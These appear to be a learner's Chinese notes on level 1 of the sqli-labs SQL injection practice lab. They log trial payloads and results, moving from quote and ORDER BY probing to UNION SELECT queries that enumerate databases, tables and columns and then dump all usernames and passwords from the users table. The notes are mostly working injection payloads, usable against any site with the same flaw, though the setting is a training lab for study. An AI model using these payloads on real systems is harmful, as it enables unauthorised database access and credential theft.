sql-labs 第一关

?id=1
?id=1' 和第一个结果不同
?id=1 and 1=1 和第一个结果相同
?id=1 and 1=2 和第一个结果相同
?id=1 order by 3 和第一个结果相同
?id=1 order by 100000 为什么结果都和第一个一样
?id=-1 union 1,2,3 什么都不输出
?id=1 union select 1,database(),3 和第一个一样
?id=1' and 1=2 --+ 无输出

?id=-1 union select 1,group_concat(table_name)
from information_schema.tables
where table_schema=database()
没有结果

?id=3-1和?id=2结果相同
?id=2'# 报错
?id=1' order by 3 --+结果和1一样

id=1' order by 4 --+结果说有未知订单4，
说明就三个字段，id，username，password

?id=-1' union select 1,2,3 --+ 显示位为2，3
?id=1' and 1=2 union select 1,version(),database() --+
前面报错，执行后面的语句

?id=1' and 1=2 union select 1,(select group_concat(schema_name)
from information_schema.schemata),3 --+
查询数据库名

?id=1' and 1=2 union select 1,
(select group_concat(table_name)
from information_schema.tables
where table_schema='security'),3 --+
查询security内的所有表名

?id=1' and 1=2 union select 1,(select group_concat(column_name)
from information_schema.columns where table name='users'),3 --+
爆破列名

?id=1' and 1=2 union select 1,
(select group_concat(password) from security.users),
(select group_concat(username) from security.users) --+
爆用户名和密码